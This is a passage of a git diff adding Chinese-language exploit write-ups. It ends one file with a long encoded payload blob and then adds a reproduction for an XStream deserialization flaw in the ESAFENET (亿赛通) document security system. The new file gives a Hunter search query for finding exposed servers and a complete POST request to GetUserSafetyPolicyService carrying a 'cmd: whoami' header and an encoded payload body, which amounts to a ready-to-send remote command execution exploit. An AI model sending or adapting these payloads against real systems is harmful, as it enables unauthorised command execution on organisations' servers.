NOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1706605621882-eeb0ddcd-0cb8-4671-855a-21d4a4fb772f.png](./img/f8IquKc4XSKxx-sl/1706605621882-eeb0ddcd-0cb8-4671-855a-21d4a4fb772f-515976.png)
+
+
+
+> 更新: 2024-04-20 22:01:33  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zm9p4olc7re48oq5>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统GetUserSafetyPolicyService存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统GetUserSafetyPolicyService存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..2888e8d
--- /dev/null
+++ b/亿赛通电子文档安全管理系统GetUserSafetyPolicyService存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统GetUserSafetyPolicyService存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统GetUserSafetyPolicyService存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/w4Hx6BvqW5VzinnP/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-021641.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/GetUserSafetyPolicyService HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.110.187:8090
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDM